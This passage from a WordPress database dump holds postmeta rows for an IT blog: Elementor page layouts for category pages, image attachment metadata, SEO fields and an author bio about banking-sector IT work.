\\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"8\"],\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0)\"},\"classic_text_stroke_text_stroke_type\":\"yes\",\"pagination_type\":\"numbers_and_prev_next\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_box_bg_color\":\"globals\\/colors?id=text\",\"classic_box_border_color\":\"globals\\/colors?id=secondary\",\"classic_title_color\":\"globals\\/colors?id=secondary\",\"pagination_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3621,743,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3623,744,'_elementor_edit_mode','builder'),
(3624,744,'_elementor_template_type','wp-page'),
(3625,744,'_elementor_version','3.12.2'),
(3626,744,'_elementor_pro_version','3.12.3'),
(3627,744,'_wp_page_template','default'),
(3628,744,'_elementor_data','[{\"id\":\"056e6f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"eb90375\",\"elType\":\"widget\",\"settings\":{\"title\":\"Database Related posts\",\"align\":\"center\",\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_background_background\":\"classic\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"__globals__\":{\"title_color\":\"globals\\/colors?id=text\",\"_background_color\":\"globals\\/colors?id=secondary\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c1b39a7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"e831e06\",\"elType\":\"widget\",\"settings\":{\"classic_show_excerpt\":\"\",\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_show_read_more\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"8\"],\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0)\"},\"classic_text_stroke_text_stroke_type\":\"yes\",\"pagination_type\":\"numbers_and_prev_next\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_box_bg_color\":\"globals\\/colors?id=text\",\"classic_box_border_color\":\"globals\\/colors?id=secondary\",\"classic_title_color\":\"globals\\/colors?id=secondary\",\"pagination_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3630,744,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3632,745,'_elementor_edit_mode','builder'),
(3633,745,'_elementor_template_type','wp-page'),
(3634,745,'_elementor_version','3.12.2'),
(3635,745,'_elementor_pro_version','3.12.3'),
(3636,745,'_wp_page_template','default'),
(3637,745,'_elementor_data','[{\"id\":\"056e6f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"eb90375\",\"elType\":\"widget\",\"settings\":{\"title\":\"Database Related posts\",\"align\":\"center\",\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_background_background\":\"classic\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"__globals__\":{\"title_color\":\"globals\\/colors?id=text\",\"_background_color\":\"globals\\/colors?id=secondary\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c1b39a7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"e831e06\",\"elType\":\"widget\",\"settings\":{\"classic_show_excerpt\":\"\",\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_show_read_more\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"8\"],\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0)\"},\"classic_text_stroke_text_stroke_type\":\"yes\",\"pagination_type\":\"numbers_and_prev_next\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_box_bg_color\":\"globals\\/colors?id=text\",\"classic_box_border_color\":\"globals\\/colors?id=secondary\",\"classic_title_color\":\"globals\\/colors?id=secondary\",\"pagination_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3639,745,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3641,746,'_elementor_edit_mode','builder'),
(3642,746,'_elementor_template_type','wp-page'),
(3643,746,'_elementor_version','3.12.2'),
(3644,746,'_elementor_pro_version','3.12.3'),
(3645,746,'_wp_page_template','default'),
(3646,746,'_elementor_data','[{\"id\":\"056e6f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"eb90375\",\"elType\":\"widget\",\"settings\":{\"title\":\"OS Related posts\",\"align\":\"center\",\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_background_background\":\"classic\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"__globals__\":{\"title_color\":\"globals\\/colors?id=text\",\"_background_color\":\"globals\\/colors?id=secondary\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c1b39a7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\"},\"elements\":[{\"id\":\"e831e06\",\"elType\":\"widget\",\"settings\":{\"classic_show_excerpt\":\"\",\"classic_meta_data\":[\"date\"],\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_show_read_more\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"posts_include\":[\"terms\"],\"posts_include_term_ids\":[\"50\"],\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0)\"},\"classic_text_stroke_text_stroke_type\":\"yes\",\"pagination_type\":\"numbers_and_prev_next\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"__globals__\":{\"classic_box_bg_color\":\"globals\\/colors?id=text\",\"classic_box_border_color\":\"globals\\/colors?id=secondary\",\"classic_title_color\":\"globals\\/colors?id=secondary\",\"pagination_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}]'),
(3648,746,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3672,752,'_edit_lock','1691215272:2'),
(3677,752,'_edit_last','2'),
(3683,756,'_wp_attached_file','2023/07/moodle.jpg'),
(3684,756,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:810;s:6:\"height\";i:456;s:4:\"file\";s:18:\"2023/07/moodle.jpg\";s:8:\"filesize\";i:31465;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"moodle-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8699;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"moodle-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3866;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"moodle-768x456.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:456;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20916;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3685,752,'_thumbnail_id','756'),
(3697,721,'_wp_old_date','2023-05-02'),
(3698,401,'_wp_old_date','2023-05-02'),
(3699,550,'_wp_old_date','2023-05-02'),
(3700,547,'_wp_old_date','2023-05-02'),
(3701,548,'_wp_old_date','2023-05-02'),
(3702,549,'_wp_old_date','2023-05-02'),
(3705,760,'_edit_lock','1698819475:2'),
(3707,760,'_edit_last','2'),
(3709,760,'_yoast_wpseo_primary_category','1'),
(3710,760,'_yoast_wpseo_content_score','90'),
(3711,760,'_yoast_wpseo_estimated-reading-time-minutes','1'),
(3712,760,'_yoast_wpseo_wordproof_timestamp',''),
(3727,51,'_yoast_wpseo_content_score','60'),
(3728,51,'_yoast_wpseo_estimated-reading-time-minutes','1'),
(3729,51,'_yoast_wpseo_wordproof_timestamp',''),
(3753,768,'_wp_attached_file','2023/08/what-is-a-firewall.jpg'),
(3754,768,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:30:\"2023/08/what-is-a-firewall.jpg\";s:8:\"filesize\";i:99446;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"what-is-a-firewall-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9897;}s:5:\"large\";a:5:{s:4:\"file\";s:32:\"what-is-a-firewall-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38898;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"what-is-a-firewall-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5008;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:30:\"what-is-a-firewall-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27454;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3755,760,'_thumbnail_id','768'),
(3756,760,'_encloseme','1'),
(3775,721,'_wp_old_date','2023-08-23'),
(3776,401,'_wp_old_date','2023-08-23'),
(3777,550,'_wp_old_date','2023-08-23'),
(3778,547,'_wp_old_date','2023-08-23'),
(3779,548,'_wp_old_date','2023-08-23'),
(3780,549,'_wp_old_date','2023-08-23'),
(3819,775,'_elementor_edit_mode','builder'),
(3820,775,'_elementor_template_type','wp-page'),
(3821,775,'_elementor_version','3.12.1'),
(3822,775,'_wp_page_template','default'),
(3823,775,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"classic_meta_separator\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3,\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"__globals__\":{\"cards_card_bg_color\":\"globals\\/colors?id=text\",\"classic_box_bg_color\":\"globals\\/colors?id=text\",\"classic_title_color\":\"globals\\/colors?id=secondary\"},\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":25,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_column_gap\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"classic_row_gap\":{\"unit\":\"px\",\"size\":23,\"sizes\":[]},\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_img_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"bbad01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9301569\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"4fc952c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Databases01-e1621614447218.jpg\",\"id\":428},\"image_size\":\"full\",\"align\":\"center\",\"caption\":\"Database\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/database\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"},\"_mask_shape\":\"flower\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a6496af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"cd5a844\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_OS01-e1621627479921.jpg\",\"id\":464},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/os\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4f40c24\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"3bc2497\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Security01-e1621661226935.jpg\",\"id\":515},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/security\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),
(3825,775,'_elementor_pro_version','3.12.3'),
(3826,775,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3828,776,'_elementor_edit_mode','builder'),
(3829,776,'_elementor_template_type','wp-page'),
(3830,776,'_elementor_version','3.12.1'),
(3831,776,'_wp_page_template','default'),
(3832,776,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"classic_meta_separator\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3,\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"__globals__\":{\"cards_card_bg_color\":\"globals\\/colors?id=text\",\"classic_box_bg_color\":\"globals\\/colors?id=text\",\"classic_title_color\":\"globals\\/colors?id=secondary\"},\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":25,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_column_gap\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"classic_row_gap\":{\"unit\":\"px\",\"size\":23,\"sizes\":[]},\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_img_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"bbad01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9301569\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"4fc952c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Databases01-e1621614447218.jpg\",\"id\":428},\"image_size\":\"full\",\"align\":\"center\",\"caption\":\"Database\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/database\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"},\"_mask_shape\":\"flower\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a6496af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"cd5a844\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_OS01-e1621627479921.jpg\",\"id\":464},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/os\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4f40c24\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"3bc2497\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Security01-e1621661226935.jpg\",\"id\":515},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/security\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),
(3834,776,'_elementor_pro_version','3.12.3'),
(3835,776,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3837,777,'_elementor_edit_mode','builder'),
(3838,777,'_elementor_template_type','wp-page'),
(3839,777,'_elementor_version','3.12.1'),
(3840,777,'_wp_page_template','default'),
